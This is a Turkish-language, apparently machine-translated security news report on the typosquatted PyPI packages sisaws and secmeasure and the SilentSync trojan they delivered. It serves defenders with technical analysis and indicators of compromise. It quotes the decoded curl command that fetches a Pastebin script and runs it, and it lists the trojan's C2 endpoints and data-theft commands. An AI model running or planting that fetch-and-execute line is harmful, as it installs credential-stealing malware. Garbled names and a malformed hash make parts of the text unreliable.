4 Ağustos 2025’te Zscaler Tehditlabz, şüphesiz geliştiricilere Python tabanlı bir uzaktan erişim Trojan (sıçan) olan Silentsync’i teslim eden iki kötü amaçlı python paketi-sisaws ve secmenaure-ortaya çıkardı.
Her iki paket de Python Paket Endeksi’ndeki (PYPI) meşru kütüphaneleri taklit etmek için yazım hatası kullanıyor ve bunları kuran projeler için ciddi bir tedarik zinciri riski oluşturuyor.
SilentSync’in çok yönlü özellikleri arasında uzaktan komut yürütme, dosya ekranlama, ekran yakalama ve web tarayıcısı veri hırsızlığı bulunur. Kötü amaçlı yazılım şu anda Windows sistemlerini hedefliyor, ancak Linux ve macOS için yerleşik kalıcılık modülleri içeriyor.
- 4 Ağustos 2025’te tehdit, iki kötü amaçlı PYPI paketi – sisaws (meşru SISA kütüphanesinin yazılışını) ve aynı yazar tarafından yaratılan secmenaure, silentync sıçanını ithalat üzerine sessizce dağıttı.
- Silentsync uzaktan komut yürütme, dizin veya dosya eksfiltrasyonunu (zip sıkıştırma ile) ve ekran görüntüsü yakalamasını destekler.
- Sıçan, kimlik bilgileri, geçmiş, otomatik doldurma kayıtları ve çerezler dahil olmak üzere Chrome, Cesur, Edge ve Firefox’tan tarayıcı verilerini çalar.
- Her iki paket de şu anda yalnızca Windows sistemlerini enfekte ederek kayıt defteri çalıştırma Keys ekleyerek kalıcılık yaratıyor.
- Silentync, dinlenme uç noktaları aracılığıyla işaretleme ve görev yoklama kullanarak HTTP üzerinden sabit kodlu bir C2 sunucusu ile iletişim kurar.
Teknik analiz
Tehditlabz’ın derin dalışı, Sisaws paketinin Arjantinli SISA API sargısı olarak maskelendiğini, DNIS’i (Arjantin’in ulusal kimlik belgesi) doğrulamak için PUCO ve RENAPER gibi modülleri taklit ettiğini ve yapılandırılmış sağlık yanıtlarını alıyor.
Ancak, başlatma komut dosyası (init.py), sert kodlanmış bir jeton tarafından korunan bir arka kapı işlevini gizler. Doğru bir şekilde çağrıldığında, gen_token API benzeri bir yanıt oluşturur ve kötü amaçlı yazılım sunumunun kilidini açmak için ikincil bir statik jeton verir.
Kaputun altında, gen_token, Helper.py’yi Pastebin’den getiren ve onu yürüten bir curl komutunu ortaya çıkarmak için altıgen kodlu bir dizeyi kodlar:
textcurl -sL https://pastebin.com/raw/jaH2uRE1 -o %TEMP%\\helper.py && python %TEMP%\\helper.py
Bu komut dosyası, Windows’ta kalıcılığa başlayan Silentync’dir.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PyHelper.
String-sanitizasyon kütüphanesi olarak ilan edilen Secmeasure Paketi, aynı yazar meta verilerini ve başlatma arka kapısını paylaşır.
Sanitize_input işlevi, özdeş onaltılı kodlu curl yükünü dağıtır. Strip_whitespace, remove_special_chars ve normalize_unicode gibi meşru işlevler yalnızca tuzak olarak bulunur; Paket, cursory muayenesini hayal kırıklığına uğratmak için eksik ithalat için NameError istisnalarını bile yükseltiyor.
Tehditlabz, 3 ve 4 Ağustos 2025 arasında dört bülten izledi: Tehdit oyuncusu tarafından hızlı yinelemeleri gösteren 0.1.0, 0.1.1, 0.1.2 ve Sisaws sürüm 2.1.6 sürümleri.
Silentync sıçan yetenekleri
Silentync, sabit kodlu C2 IP’sini kodladı (200.58.107[.]25) Çalışma zamanında Base64’ten, HTTP üzerinden TCP bağlantı noktası 5000 üzerinden iletişim kurarak. Adımlı işlemler için dinlenme uç noktalarını uygular:
| Son nokta | İşlev |
|---|---|
| /giriş | Bağlantıyı doğrulamak için işaret |
| /emretmek | Komutlar Anketi |
| /cevap | Komut Sonuçları Gönder |
| /arşiv | Çalınan dosyaları/verileri yükleyin |
Desteklenen komutlar şunları içerir:
| Emretmek | Tanım |
|---|---|
| CMD | Kabuk komutlarını yürüt |
| elde etmek | Dosyaları veya dizinleri pespiltrat (“/*” son eki kullanılırsa fermuar sıkıştırılmıştır) |
| ekran görüntüsü | Masaüstü Ekran görüntüsü yakalama |
| yüklemek | C2’ye bir dosya yüklemesinin beklemede olduğunu bildirin |
| BrowserData | Tarayıcılardan Hasat Kimlik Bilgileri, Çerez, Tarih ve Otomatik Fil |
Tarayıcı veri hırsızlığı, krom ailesi tarayıcıları ve Firefox için yalnızca pencerelerde uygulanır. Eksfiltrasyondan sonra Silentync, tespitten kaçınmak için yerel eserleri güvenli bir şekilde siler.
Sisaws ve Secmeasease paketlerinin keşfi, kamu depolarında evrimleşen yazım hatası tehdidinin altını çiziyor.
Meşru kütüphaneleri taklit ederek ve Silentsync sıçanını yerleştiren arka planları yerleştirerek, tehdit aktörleri kalkınma ortamlarına sızabilir ve tespit edilmeyen hassas verileri hasat edebilir.
Geliştiriciler ve güvenlik ekipleri, üçüncü taraf bağımlılıkları entegre etmeden önce, sağlama toplamı doğrulaması, itibar tabanlı filtreleme ve kum havuzu testi gibi daha katı paket-doğrulama önlemlerini benimsemelidir.
Dikkat ve proaktif izleme, yazılım tedarik zincirini sessiz, kötü niyetli implantlara karşı korumak için kritik öneme sahiptir.
Uzlaşma Göstergeleri (IOCS)
| MD5 | İsim |
|---|---|
| 32723D73236CA4D7C18FF8F9924127 | Sisaws pypi paketi |
| 9A092BBFC5325CBFCA2F9807D074616A | Secmenaure Pypi Paketi |
| 3918CACE55342909C8309EC37D0207FD | Silentync Sıçanı |
| https: // Pastebin[.]com/raw/jah2ure1 | Urll’i indirme |
| 200.58.107[.]25 | C2 Sunucusu |
Bu hikayeyi ilginç bul! Daha fazla güncelleme almak için bizi LinkedIn ve X’te takip edin.